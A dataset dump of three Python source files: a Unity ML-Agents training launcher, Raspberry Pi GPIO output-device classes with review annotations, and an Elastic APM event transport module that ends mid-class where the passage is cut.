source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
learn.py | # # Unity ML-Agents Toolkit
import logging
from multiprocessing import Process, Queue
import os
import glob
import shutil
import numpy as np
import yaml
from docopt import docopt
from typing import Optional
from mlagents.trainers.trainer_controller import TrainerController
from mlagents.trainers.exception import TrainerError
from mlagents.trainers import MetaCurriculumError, MetaCurriculum
from mlagents.envs import UnityEnvironment
from mlagents.envs.exception import UnityEnvironmentException
def run_training(sub_id: int, run_seed: int, run_options, process_queue):
    """
    Launches training session.
    :param process_queue: Queue used to send signal back to main.
    :param sub_id: Unique id for training session.
    :param run_seed: Random seed used for training.
    :param run_options: Command line arguments for training (docopt dict).
    """
    # Docker Parameters
    # docopt stores unset options as the *string* 'None', not the None object,
    # hence the explicit string comparisons below.
    docker_target_name = (run_options['--docker-target-name']
                          if run_options['--docker-target-name'] != 'None' else None)
    # General parameters
    env_path = (run_options['--env']
                if run_options['--env'] != 'None' else None)
    run_id = run_options['--run-id']
    load_model = run_options['--load']
    train_model = run_options['--train']
    save_freq = int(run_options['--save-freq'])
    keep_checkpoints = int(run_options['--keep-checkpoints'])
    worker_id = int(run_options['--worker-id'])
    curriculum_folder = (run_options['--curriculum']
                         if run_options['--curriculum'] != 'None' else None)
    lesson = int(run_options['--lesson'])
    fast_simulation = not bool(run_options['--slow'])
    no_graphics = run_options['--no-graphics']
    trainer_config_path = run_options['<trainer-config-path>']
    # Recognize and use docker volume if one is passed as an argument
    if not docker_target_name:
        model_path = './models/{run_id}'.format(run_id=run_id)
        summaries_dir = './summaries'
    else:
        # Inside a container all paths are rooted at the mounted docker volume.
        trainer_config_path = \
            '/{docker_target_name}/{trainer_config_path}'.format(
                docker_target_name=docker_target_name,
                trainer_config_path=trainer_config_path)
        if curriculum_folder is not None:
            curriculum_folder = \
                '/{docker_target_name}/{curriculum_folder}'.format(
                    docker_target_name=docker_target_name,
                    curriculum_folder=curriculum_folder)
        model_path = '/{docker_target_name}/models/{run_id}'.format(
            docker_target_name=docker_target_name,
            run_id=run_id)
        summaries_dir = '/{docker_target_name}/summaries'.format(
            docker_target_name=docker_target_name)
    trainer_config = load_config(trainer_config_path)
    # Each concurrent session gets a distinct worker id, hence a distinct
    # communication port (base port + worker_id + sub_id).
    env = init_environment(env_path, docker_target_name, no_graphics, worker_id + sub_id, fast_simulation, run_seed)
    maybe_meta_curriculum = try_create_meta_curriculum(curriculum_folder, env)
    external_brains = {}
    for brain_name in env.external_brain_names:
        external_brains[brain_name] = env.brains[brain_name]
    # Create controller and begin training.
    tc = TrainerController(model_path, summaries_dir, run_id + '-' + str(sub_id),
                           save_freq, maybe_meta_curriculum,
                           load_model, train_model,
                           keep_checkpoints, lesson, external_brains, run_seed)
    # Signal that environment has been launched.
    process_queue.put(True)
    # Begin training
    tc.start_learning(env, trainer_config)
def try_create_meta_curriculum(curriculum_folder: Optional[str], env: UnityEnvironment) -> Optional[MetaCurriculum]:
    """Build a MetaCurriculum for ``curriculum_folder``, or None when no folder is given.

    :param curriculum_folder: directory of curriculum json files, or None.
    :param env: the launched UnityEnvironment (supplies reset parameters and brains).
    :raises MetaCurriculumError: when a curriculum names a Brain the environment lacks.
    """
    if curriculum_folder is None:
        return None
    meta_curriculum = MetaCurriculum(curriculum_folder, env._resetParameters)
    if meta_curriculum:
        # Every curriculum must correspond to one of the environment's Brains.
        for brain_name in meta_curriculum.brains_to_curriculums.keys():
            if brain_name in env.external_brain_names:
                continue
            raise MetaCurriculumError('One of the curricula '
                                      'defined in ' +
                                      curriculum_folder + ' '
                                      'does not have a corresponding '
                                      'Brain. Check that the '
                                      'curriculum file has the same '
                                      'name as the Brain '
                                      'whose curriculum it defines.')
    return meta_curriculum
def prepare_for_docker_run(docker_target_name, env_path):
    """Copy the environment binary out of the docker volume into /ml-agents.

    Some OS/VM images mount volumes with flags that forbid execution, so any
    file or directory under the volume whose name contains ``env_path`` is
    copied into the container before launch.

    :param docker_target_name: name of the mounted docker volume.
    :param env_path: name of the Unity executable to locate.
    :return: the rewritten executable path under /ml-agents.
    """
    volume_glob = '/{docker_target_name}/*'.format(
        docker_target_name=docker_target_name)
    for candidate in glob.glob(volume_glob):
        if env_path not in candidate:
            continue
        try:
            base_name = os.path.basename(candidate)
            if os.path.isdir(candidate):
                shutil.copytree(candidate,
                                '/ml-agents/{b}'.format(b=base_name))
            else:
                src_f = '/{docker_target_name}/{b}'.format(
                    docker_target_name=docker_target_name, b=base_name)
                dst_f = '/ml-agents/{b}'.format(b=base_name)
                shutil.copyfile(src_f, dst_f)
                os.chmod(dst_f, 0o775)  # Make executable
        except Exception as e:
            # Best-effort copy: log and keep going with the remaining entries.
            logging.getLogger('mlagents.trainers').info(e)
    return '/ml-agents/{env_path}'.format(env_path=env_path)
def load_config(trainer_config_path):
    """Load the trainer YAML configuration and return it as a dict.

    :param trainer_config_path: Path to the trainer configuration YAML file.
    :return: the parsed configuration mapping.
    :raises UnityEnvironmentException: if the file is missing or cannot be decoded.
    """
    try:
        with open(trainer_config_path) as data_file:
            # safe_load: yaml.load without an explicit Loader can construct
            # arbitrary Python objects from the file and is deprecated.
            trainer_config = yaml.safe_load(data_file)
            return trainer_config
    except IOError:
        raise UnityEnvironmentException('Parameter file could not be found '
                                        'at {}.'
                                        .format(trainer_config_path))
    except UnicodeDecodeError:
        raise UnityEnvironmentException('There was an error decoding '
                                        'Trainer Config from this path : {}'
                                        .format(trainer_config_path))
def init_environment(env_path, docker_target_name, no_graphics, worker_id, fast_simulation, seed):
    # Launches and returns a UnityEnvironment for the given executable
    # (or connects to the editor when env_path is None).
    # NOTE(review): fast_simulation is accepted but never used here — confirm
    # whether it should be forwarded to the environment.
    if env_path is not None:
        # Strip out executable extensions if passed
        # NOTE(review): str.replace removes these substrings *anywhere* in the
        # path, not only as a trailing extension — confirm paths never contain
        # them mid-string.
        env_path = (env_path.strip()
                    .replace('.app', '')
                    .replace('.exe', '')
                    .replace('.x86_64', '')
                    .replace('.x86', ''))
    docker_training = docker_target_name is not None
    if docker_training and env_path is not None:
        """
        Comments for future maintenance:
        Some OS/VM instances (e.g. COS GCP Image) mount filesystems
        with COS flag which prevents execution of the Unity scene,
        to get around this, we will copy the executable into the
        container.
        """
        # Navigate in docker path and find env_path and copy it.
        env_path = prepare_for_docker_run(docker_target_name,
                                          env_path)
    return UnityEnvironment(
        file_name=env_path,
        worker_id=worker_id,
        seed=seed,
        docker_training=docker_training,
        no_graphics=no_graphics
    )
def main():
    """CLI entry point: print the banner, parse docopt options and launch
    one or more training sessions."""
    try:
        print('''

                        ▄▄▄▓▓▓▓
                   ╓▓▓▓▓▓▓█▓▓▓▓▓
              ,▄▄▄m▀▀▀'  ,▓▓▓▀▓▓▄                           ▓▓▓  ▓▓▌
            ▄▓▓▓▀'      ▄▓▓▀  ▓▓▓      ▄▄     ▄▄ ,▄▄ ▄▄▄▄   ,▄▄ ▄▓▓▌▄ ▄▄▄    ,▄▄
          ▄▓▓▓▀        ▄▓▓▀   ▐▓▓▌     ▓▓▌   ▐▓▓ ▐▓▓▓▀▀▀▓▓▌ ▓▓▓ ▀▓▓▌▀ ^▓▓▌  ╒▓▓▌
        ▄▓▓▓▓▓▄▄▄▄▄▄▄▄▓▓▓      ▓▀      ▓▓▌   ▐▓▓ ▐▓▓    ▓▓▓ ▓▓▓  ▓▓▌   ▐▓▓▄ ▓▓▌
        ▀▓▓▓▓▀▀▀▀▀▀▀▀▀▀▓▓▄     ▓▓      ▓▓▌   ▐▓▓ ▐▓▓    ▓▓▓ ▓▓▓  ▓▓▌    ▐▓▓▐▓▓
          ^█▓▓▓        ▀▓▓▄   ▐▓▓▌     ▓▓▓▓▄▓▓▓▓ ▐▓▓    ▓▓▓ ▓▓▓  ▓▓▓▄    ▓▓▓▓`
            '▀▓▓▓▄      ^▓▓▓  ▓▓▓      └▀▀▀▀ ▀▀ ^▀▀    `▀▀ `▀▀   '▀▀    ▐▓▓▌
               ▀▀▀▀▓▄▄▄   ▓▓▓▓▓▓,                                      ▓▓▓▓▀
                   `▀█▓▓▓▓▓▓▓▓▓▌
                        ¬`▀▀▀█▓

        ''')
    except:
        # Some consoles cannot render the Unicode banner; fall back to text.
        print('\n\n\tUnity Technologies\n')
    logger = logging.getLogger('mlagents.trainers')
    _USAGE = '''
    Usage:
      mlagents-learn <trainer-config-path> [options]
      mlagents-learn --help
    Options:
      --env=<file>               Name of the Unity executable [default: None].
      --curriculum=<directory>   Curriculum json directory for environment [default: None].
      --keep-checkpoints=<n>     How many model checkpoints to keep [default: 5].
      --lesson=<n>               Start learning from this lesson [default: 0].
      --load                     Whether to load the model or randomly initialize [default: False].
      --run-id=<path>            The directory name for model and summary statistics [default: ppo].
      --num-runs=<n>             Number of concurrent training sessions [default: 1].
      --save-freq=<n>            Frequency at which to save model [default: 50000].
      --seed=<n>                 Random seed used for training [default: -1].
      --slow                     Whether to run the game at training speed [default: False].
      --train                    Whether to train model, or only run inference [default: False].
      --worker-id=<n>            Number to add to communication port (5005) [default: 0].
      --docker-target-name=<dt>  Docker volume to store training-specific files [default: None].
      --no-graphics              Whether to run the environment in no-graphics mode [default: False].
    '''
    options = docopt(_USAGE)
    logger.info(options)
    num_runs = int(options['--num-runs'])
    seed = int(options['--seed'])
    # Multiple concurrent sessions require an executable; the editor can only
    # host a single environment.
    if options['--env'] == 'None' and num_runs > 1:
        raise TrainerError('It is not possible to launch more than one concurrent training session '
                           'when training from the editor.')
    jobs = []
    run_seed = seed
    if num_runs == 1:
        # Single session runs in-process; the Queue is created only to satisfy
        # run_training's signature.
        if seed == -1:
            run_seed = np.random.randint(0, 10000)
        run_training(0, run_seed, options, Queue())
    else:
        for i in range(num_runs):
            if seed == -1:
                run_seed = np.random.randint(0, 10000)
            process_queue = Queue()
            p = Process(target=run_training, args=(i, run_seed, options, process_queue))
            jobs.append(p)
            p.start()
            # Wait for signal that environment has successfully launched
            while process_queue.get() is not True:
                continue

# For python debugger to directly run this script
if __name__ == "__main__":
    main()
|
output_devices.py | import warnings
from time import sleep
from threading import Lock
from itertools import repeat
from RPi import GPIO
from .devices import GPIODeviceError, GPIODevice, GPIOThread
class OutputDeviceError(GPIODeviceError):
    """Error raised by GPIO output devices."""
    pass
class OutputDevice(GPIODevice):
    """
    Represents a generic GPIO output device.
    This class extends `GPIODevice` to add facilities common to GPIO output
    devices: an `on` method to switch the device on, and a corresponding `off`
    method.
    """
    def __init__(self, pin=None):
        """
        :param pin: GPIO pin number the device is attached to.
        """
        super(OutputDevice, self).__init__(pin)
        # NOTE: catch_warnings isn't thread-safe but hopefully no-one's messing
        # around with GPIO init within background threads...
        with warnings.catch_warnings(record=True) as w:
            GPIO.setup(pin, GPIO.OUT)
        # The only warning we want to squash is a RuntimeWarning that is thrown
        # when setting pins 2 or 3. Anything else should be replayed
        for warning in w:
            if warning.category != RuntimeWarning or pin not in (2, 3):
                warnings.showwarning(
                    warning.message, warning.category, warning.filename,
                    warning.lineno, warning.file, warning.line
                )

    def on(self):
        """
        Turns the device on.
        """
        GPIO.output(self.pin, True)

    def off(self):
        """
        Turns the device off.
        """
        GPIO.output(self.pin, False)
class DigitalOutputDevice(OutputDevice):
    """
    Represents a generic output device with typical on/off behaviour.
    This class extends `OutputDevice` with a `toggle` method to switch the
    device between its on and off states, and a `blink` method which uses an
    optional background thread to handle toggling the device state without
    further interaction.
    """
    def __init__(self, pin=None):
        super(DigitalOutputDevice, self).__init__(pin)
        # Background GPIOThread while blinking, else None.
        self._blink_thread = None
        # Serializes toggle's read-modify-write of the device state.
        self._lock = Lock()

    def on(self):
        """
        Turns the device on.
        """
        # Any blink in progress is cancelled by an explicit on/off.
        self._stop_blink()
        super(DigitalOutputDevice, self).on()

    def off(self):
        """
        Turns the device off.
        """
        self._stop_blink()
        super(DigitalOutputDevice, self).off()

    def toggle(self):
        """
        Reverse the state of the device.
        If it's on, turn it off; if it's off, turn it on.
        """
        with self._lock:
            if self.is_active:
                self.off()
            else:
                self.on()

    def blink(self, on_time=1, off_time=1, n=None, background=True):
        """
        Make the device turn on and off repeatedly.
        on_time: 1
            Number of seconds on
        off_time: 1
            Number of seconds off
        n: None
            Number of times to blink; None means forever
        background: True
            If True, start a background thread to continue blinking and return
            immediately. If False, only return when the blink is finished
            (warning: the default value of n will result in this method never
            returning).
        """
        self._stop_blink()
        self._blink_thread = GPIOThread(
            target=self._blink_led, args=(on_time, off_time, n)
        )
        self._blink_thread.start()
        if not background:
            self._blink_thread.join()
            self._blink_thread = None

    def _stop_blink(self):
        # Stop and discard the background blink thread, if any.
        if self._blink_thread:
            self._blink_thread.stop()
            self._blink_thread = None

    def _blink_led(self, on_time, off_time, n):
        # Runs on the blink thread: alternate on/off until n cycles complete
        # or the thread's stopping event is set.
        # NOTE(review): reads self._blink_thread without holding _lock; if
        # _stop_blink clears it mid-cycle this could raise AttributeError —
        # confirm against GPIOThread's stop ordering.
        iterable = repeat(0) if n is None else repeat(0, n)
        for i in iterable:
            super(DigitalOutputDevice, self).on()
            if self._blink_thread.stopping.wait(on_time):
                break
            super(DigitalOutputDevice, self).off()
            if self._blink_thread.stopping.wait(off_time):
                break
class LED(DigitalOutputDevice):
    """
    An LED (Light Emitting Diode) component.
    A typical configuration of such a device is to connect a GPIO pin to the
    anode (long leg) of the LED, and the cathode (short leg) to ground, with
    an optional resistor to prevent the LED from burning out.
    """
    pass
class Buzzer(DigitalOutputDevice):
    """
    A digital Buzzer component.
    A typical configuration of such a device is to connect a GPIO pin to the
    anode (long leg) of the buzzer, and the cathode (short leg) to ground.
    """
    pass
class PWMOutputDevice(DigitalOutputDevice):
    """
    Generic Output device configured for PWM (Pulse-Width Modulation).

    The device ``value`` is expressed in the 0..1 range and mapped onto the
    0..100 duty-cycle range expected by RPi.GPIO.
    """
    def __init__(self, pin=None):
        """
        :param pin: GPIO pin number the device is attached to.
        """
        super(PWMOutputDevice, self).__init__(pin)
        self._frequency = 100  # PWM frequency in Hz
        self._pwm = GPIO.PWM(self._pin, self._frequency)
        self._pwm.start(0)
        self._min_pwm = 0
        self._max_pwm = 1
        self.value = 0

    def on(self):
        """
        Turn the device on
        """
        self.value = self._max_pwm

    def off(self):
        """
        Turn the device off
        """
        self.value = self._min_pwm

    def toggle(self):
        """
        Reverse the state of the device.
        If it's on (a value greater than 0), turn it off; if it's off, turn it
        on.
        """
        _min = self._min_pwm
        _max = self._max_pwm
        self.value = _max if self.value == _min else _min

    @property
    def value(self):
        """The current device value in the 0..1 range."""
        return self._value

    @value.setter
    def value(self, n):
        _min = self._min_pwm
        _max = self._max_pwm
        if not _min <= n <= _max:
            raise GPIODeviceError(
                "Value must be between %s and %s" % (_min, _max)
            )
        # BUG FIX: previously the value was stored *after* scaling to the
        # 0..100 duty-cycle range, so reading ``value`` back returned e.g. 100
        # for an input of 1, and re-assigning that reading raised an error.
        # Store the caller's 0..1 value and scale only for RPi.GPIO.
        self._pwm.ChangeDutyCycle(n * 100)
        self._value = n
class RGBLED(object):
    """
    Single LED with individually controllable Red, Green and Blue components.
    """
    def __init__(self, red=None, green=None, blue=None):
        """
        :param red: GPIO pin for the red anode.
        :param green: GPIO pin for the green anode.
        :param blue: GPIO pin for the blue anode.
        :raises GPIODeviceError: if any pin is missing.
        """
        if not all([red, green, blue]):
            raise GPIODeviceError('Red, Green and Blue pins must be provided')
        self._red = PWMOutputDevice(red)
        self._green = PWMOutputDevice(green)
        self._blue = PWMOutputDevice(blue)
        self._leds = (self._red, self._green, self._blue)
        # BUG FIX: _validate() referenced self._min_value/_max_value which
        # were never defined anywhere, so every colour assignment raised
        # AttributeError. Derive the bounds from the PWM devices' range.
        self._min_value = self._red._min_pwm
        self._max_value = self._red._max_pwm

    def on(self):
        """
        Turn the device on
        """
        for led in self._leds:
            led.on()

    def off(self):
        """
        Turn the device off
        """
        for led in self._leds:
            led.off()

    @property
    def red(self):
        """The red component's value."""
        return self._red.value

    @red.setter
    def red(self, value):
        self._red.value = self._validate(value)

    @property
    def green(self):
        """The green component's value."""
        return self._green.value

    @green.setter
    def green(self, value):
        self._green.value = self._validate(value)

    @property
    def blue(self):
        """The blue component's value."""
        return self._blue.value

    @blue.setter
    def blue(self, value):
        self._blue.value = self._validate(value)

    @property
    def rgb(self):
        """The (red, green, blue) component values as a tuple."""
        r = self.red
        g = self.green
        b = self.blue
        return (r, g, b)

    @rgb.setter
    def rgb(self, values):
        r, g, b = values
        self.red = r
        self.green = g
        self.blue = b

    def _validate(self, value):
        """Return *value* unchanged if it lies within the valid colour range.

        :raises GPIODeviceError: if the value is out of range.
        """
        _min = self._min_value
        _max = self._max_value
        # BUG FIX: the comparison was inverted (_min >= value >= _max), which
        # rejected every value inside the valid range.
        if _min <= value <= _max:
            return value
        else:
            raise GPIODeviceError(
                "Colour value must be between %s and %s" % (_min, _max)
            )
class Motor(object):
    """
    Generic bi-directional motor.

    Driven by two PWM outputs, one per direction; at most one direction is
    energised at any time.
    """
    def __init__(self, forward=None, back=None):
        """
        :param forward: GPIO pin driving the forward direction.
        :param back: GPIO pin driving the reverse direction.
        :raises GPIODeviceError: if either pin is missing.
        """
        if not all([forward, back]):
            raise GPIODeviceError('forward and back pins must be provided')
        self._forward = PWMOutputDevice(forward)
        self._backward = PWMOutputDevice(back)
        self._min_pwm = self._forward._min_pwm
        self._max_pwm = self._forward._max_pwm

    def _drive(self, active, inactive, speed):
        # Cut the opposing direction, kick the active one to full power, then
        # settle down to the requested speed after a short warm-up.
        inactive.value = self._min_pwm
        active.value = self._max_pwm
        if speed < 1:
            sleep(0.1)  # warm up the motor
            active.value = speed

    def forward(self, speed=1):
        """
        Drive the motor forwards
        """
        self._drive(self._forward, self._backward, speed)

    def backward(self, speed=1):
        """
        Drive the motor backwards
        """
        self._drive(self._backward, self._forward, speed)

    def stop(self):
        """
        Stop the motor
        """
        self._forward.off()
        self._backward.off()
|
base.py | # -*- coding: utf-8 -*-
# BSD 3-Clause License
#
# Copyright (c) 2019, Elasticsearch BV
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import gzip
import os
import random
import threading
import time
import timeit
from collections import defaultdict
from elasticapm.contrib.async_worker import AsyncWorker
from elasticapm.utils import compat, json_encoder
from elasticapm.utils.logging import get_logger
from elasticapm.utils.threading import ThreadManager
logger = get_logger("elasticapm.transport")
class TransportException(Exception):
    """Raised when a transport fails to deliver data."""

    def __init__(self, message, data=None, print_trace=True):
        """
        :param message: human-readable error description.
        :param data: the payload whose delivery failed, if any.
        :param print_trace: whether a traceback should be logged for this error.
        """
        self.data = data
        self.print_trace = print_trace
        super(TransportException, self).__init__(message)
class Transport(ThreadManager):
    """
    All transport implementations need to subclass this class
    You must implement a send method..
    """

    # Subclasses that deliver on a background worker set this to True.
    async_mode = False

    def __init__(
        self,
        client,
        metadata=None,
        compress_level=5,
        json_serializer=json_encoder.dumps,
        max_flush_time=None,
        max_buffer_size=None,
        queue_chill_count=500,
        queue_chill_time=1.0,
        processors=None,
        **kwargs
    ):
        """
        Create a new Transport instance

        :param client: the client object this transport belongs to
        :param metadata: Metadata object to prepend to every queue
        :param compress_level: GZip compress level. If zero, no GZip compression will be used
        :param json_serializer: serializer to use for JSON encoding
        :param max_flush_time: Maximum time between flushes in seconds
        :param max_buffer_size: Maximum size of buffer before flush
        :param queue_chill_count: queue length up to which "chilled" puts may skip waking the processor thread
        :param queue_chill_time: maximum time in seconds a "chilled" put may delay waking the processor thread
        :param processors: optional list of callables applied to each event before serialization
        :param kwargs: ignored; accepted for subclass compatibility
        """
        self.client = client
        self.state = TransportState()
        self._metadata = metadata if metadata is not None else {}
        # Clamp to gzip's valid 0..9 range; None is treated as "no compression".
        self._compress_level = min(9, max(0, compress_level if compress_level is not None else 0))
        self._json_serializer = json_serializer
        self._max_flush_time = max_flush_time
        self._max_buffer_size = max_buffer_size
        self._queued_data = None
        self._event_queue = self._init_event_queue(chill_until=queue_chill_count, max_chill_time=queue_chill_time)
        self._is_chilled_queue = isinstance(self._event_queue, ChilledQueue)
        self._thread = None
        self._last_flush = timeit.default_timer()
        # Per-event-type counters of events written to the buffer.
        self._counts = defaultdict(int)
        # Set whenever the processor thread has flushed; cleared on new events.
        self._flushed = threading.Event()
        self._closed = False
        self._processors = processors if processors is not None else []

    def queue(self, event_type, data, flush=False):
        """Queue a single event for sending; drop it if the queue is full.

        :param event_type: event kind (e.g. "transaction", or "close" to shut down)
        :param data: the event payload; may be None
        :param flush: if True, force a flush once this event is processed
        """
        try:
            self._flushed.clear()
            # A "chilled" put may skip waking the processor thread; never
            # chill close/flush events, which must be handled promptly.
            kwargs = {"chill": not (event_type == "close" or flush)} if self._is_chilled_queue else {}
            self._event_queue.put((event_type, data, flush), block=False, **kwargs)
        except compat.queue.Full:
            logger.debug("Event of type %s dropped due to full event queue", event_type)

    def _process_queue(self):
        # Event loop of the processor thread: drain the queue into a gzip
        # buffer and flush when forced, on timeout, or when the buffer grows
        # past max_buffer_size. Returns only on a "close" event.
        buffer = self._init_buffer()
        buffer_written = False
        # add some randomness to timeout to avoid stampedes of several workers that are booted at the same time
        max_flush_time = self._max_flush_time * random.uniform(0.9, 1.1) if self._max_flush_time else None
        while True:
            since_last_flush = timeit.default_timer() - self._last_flush
            # take max flush time into account to calculate timeout
            timeout = max(0, max_flush_time - since_last_flush) if max_flush_time else None
            timed_out = False
            try:
                event_type, data, flush = self._event_queue.get(block=True, timeout=timeout)
            except compat.queue.Empty:
                event_type, data, flush = None, None, None
                timed_out = True
            if event_type == "close":
                if buffer_written:
                    self._flush(buffer)
                self._flushed.set()
                return  # time to go home!
            if data is not None:
                data = self._process_event(event_type, data)
                if data is not None:
                    buffer.write((self._json_serializer({event_type: data}) + "\n").encode("utf-8"))
                    buffer_written = True
                    self._counts[event_type] += 1
            # Size of the *compressed* data written so far.
            queue_size = 0 if buffer.fileobj is None else buffer.fileobj.tell()
            if flush:
                logger.debug("forced flush")
            elif timed_out or timeout == 0:
                # update last flush time, as we might have waited for a non trivial amount of time in
                # _event_queue.get()
                since_last_flush = timeit.default_timer() - self._last_flush
                logger.debug(
                    "flushing due to time since last flush %.3fs > max_flush_time %.3fs",
                    since_last_flush,
                    max_flush_time,
                )
                flush = True
            elif self._max_buffer_size and queue_size > self._max_buffer_size:
                logger.debug(
                    "flushing since queue size %d bytes > max_queue_size %d bytes", queue_size, self._max_buffer_size
                )
                flush = True
            if flush:
                if buffer_written:
                    self._flush(buffer)
                self._last_flush = timeit.default_timer()
                buffer = self._init_buffer()
                buffer_written = False
                max_flush_time = self._max_flush_time * random.uniform(0.9, 1.1) if self._max_flush_time else None
                self._flushed.set()

    def _process_event(self, event_type, data):
        # Run the data through processors
        # Returns None (dropping the event) if any processor returns a falsy value.
        for processor in self._processors:
            if not hasattr(processor, "event_types") or event_type in processor.event_types:
                data = processor(self, data)
                if not data:
                    logger.debug(
                        "Dropped event of type %s due to processor %s.%s",
                        event_type,
                        getattr(processor, "__module__"),
                        getattr(processor, "__name__"),
                    )
                    return None
        return data

    def _init_buffer(self):
        # Start a fresh gzip buffer with the metadata line already written,
        # as required once per batch.
        buffer = gzip.GzipFile(fileobj=compat.BytesIO(), mode="w", compresslevel=self._compress_level)
        data = (self._json_serializer({"metadata": self._metadata}) + "\n").encode("utf-8")
        buffer.write(data)
        return buffer

    def _init_event_queue(self, chill_until, max_chill_time):
        # some libraries like eventlet monkeypatch queue.Queue and switch out the implementation.
        # In those cases we can't rely on internals of queue.Queue to be there, so we simply use
        # their queue and forgo the optimizations of ChilledQueue. In the case of eventlet, this
        # isn't really a loss, because the main reason for ChilledQueue (avoiding context switches
        # due to the event processor thread being woken up all the time) is not an issue.
        if all(
            (
                hasattr(compat.queue.Queue, "not_full"),
                hasattr(compat.queue.Queue, "not_empty"),
                hasattr(compat.queue.Queue, "unfinished_tasks"),
            )
        ):
            return ChilledQueue(maxsize=10000, chill_until=chill_until, max_chill_time=max_chill_time)
        else:
            return compat.queue.Queue(maxsize=10000)

    def _flush(self, buffer):
        """
        Flush the queue. This method should only be called from the event processing queue
        :param buffer: the gzip buffer of serialized events to send
        :return: None
        """
        if not self.state.should_try():
            # Still inside the failure back-off window; drop the batch.
            logger.error("dropping flushed data due to transport failure back-off")
        else:
            fileobj = buffer.fileobj  # get a reference to the fileobj before closing the gzip file
            buffer.close()
            # StringIO on Python 2 does not have getbuffer, so we need to fall back to getvalue
            data = fileobj.getbuffer() if hasattr(fileobj, "getbuffer") else fileobj.getvalue()
            try:
                self.send(data)
                self.handle_transport_success()
            except Exception as e:
                self.handle_transport_fail(e)

    def start_thread(self):
        # Start (or restart after a fork) the event processor thread. The pid
        # is stashed on the thread object so a forked child can detect that it
        # inherited a thread belonging to the parent process.
        current_pid = os.getpid()
        if (not self._thread or current_pid != self._thread.pid) and not self._closed:
            try:
                self._thread = threading.Thread(target=self._process_queue, name="eapm event processor thread")
                self._thread.daemon = True
                self._thread.pid = current_pid
                self._thread.start()
            except RuntimeError:
                pass

    def send(self, data):
        """
        You need to override this to do something with the actual
        data. Usually - this is sending to a server
        """
        raise NotImplementedError

    def close(self):
        """
        Cleans up resources and closes connection
        :return:
        """
        # No-op when already closed, or when the processor thread belongs to
        # another process (i.e. we are a forked child).
        if self._closed or (not self._thread or self._thread.pid != os.getpid()):
            return
        self._closed = True
        self.queue("close", None)
        if not self._flushed.wait(timeout=self._max_flush_time):
            raise ValueError("close timed out")

    # ThreadManager alias: stopping the thread means closing the transport.
    stop_thread = close

    def flush(self):
        """
        Trigger a flush of the queue.
        Note: this method will only return once the queue is empty. This means it can block indefinitely if more events
        are produced in other threads than can be consumed.
        """
        self.queue(None, None, flush=True)
        if not self._flushed.wait(timeout=self._max_flush_time):
            raise ValueError("flush timed out")

    def handle_transport_success(self, **kwargs):
        """
        Success handler called by the transport on successful send
        """
        self.state.set_success()

    def handle_transport_fail(self, exception=None, **kwargs):
        """
        Failure handler called by the transport on send failure
        """
        message = str(exception)
        logger.error("Failed to submit message: %r", message, exc_info=getattr(exception, "print_trace", True))
        self.state.set_fail()
class AsyncTransport(Transport):
    """Transport variant that performs sends on a background worker."""

    async_mode = True
    sync_transport = Transport

    def __init__(self, *args, **kwargs):
        super(AsyncTransport, self).__init__(*args, **kwargs)
        self._worker = None

    @property
    def worker(self):
        """Lazily create the async worker, replacing one that has died."""
        if not self._worker or not self._worker.is_alive():
            self._worker = AsyncWorker()
        return self._worker

    def send_sync(self, data=None):
        """Send synchronously, routing the outcome to the state handlers."""
        try:
            self.sync_transport.send(self, data)
            self.handle_transport_success()
        except Exception as exc:
            self.handle_transport_fail(exception=exc)

    def send_async(self, data):
        """Queue *data* for delivery on the worker thread."""
        self.worker.queue(self.send_sync, {"data": data})

    def close(self):
        """Close the underlying transport, then terminate the worker if any."""
        super(AsyncTransport, self).close()
        if self._worker:
            self._worker.main_thread_terminated()
class TransportState(object):
    """Tracks transport health to drive retry back-off decisions."""

    ONLINE = 1
    ERROR = 0

    def __init__(self):
        self.status = self.ONLINE
        self.last_check = None
        self.retry_number = -1

    def should_try(self):
        """Return True when a send attempt is currently allowed.

        While online, always; after failures, only once a quadratically
        growing back-off interval (capped at 36 seconds) has elapsed.
        """
        if self.status != self.ONLINE:
            interval = min(self.retry_number, 6) ** 2
            return timeit.default_timer() - self.last_check > interval
        return True

    def set_fail(self):
        """Record a failed send: enter ERROR state and bump the retry count."""
        self.status = self.ERROR
        self.retry_number += 1
        self.last_check = timeit.default_timer()

    def set_success(self):
        """Record a successful send and reset the back-off bookkeeping."""
        self.status = self.ONLINE
        self.retry_number = -1
        self.last_check = None

    def did_fail(self):
        """Return True while the transport is in the ERROR state."""
        return self.status == self.ERROR
class ChilledQueue(compat.queue.Queue, object):
    """
    A queue subclass that is a bit more chill about how often it notifies the not empty event
    Note: we inherit from object because queue.Queue is an old-style class in Python 2. This can
    be removed once we stop support for Python 2
    """
    def __init__(self, maxsize=0, chill_until=100, max_chill_time=1.0):
        """
        :param maxsize: maximum queue length (0 means unbounded)
        :param chill_until: queue length above which puts always wake the consumer
        :param max_chill_time: maximum seconds between consumer wake-ups while chilled
        """
        self._chill_until = chill_until
        self._max_chill_time = max_chill_time
        # Timestamp of the last not_empty notification.
        self._last_unchill = time.time()
        super(ChilledQueue, self).__init__(maxsize=maxsize)

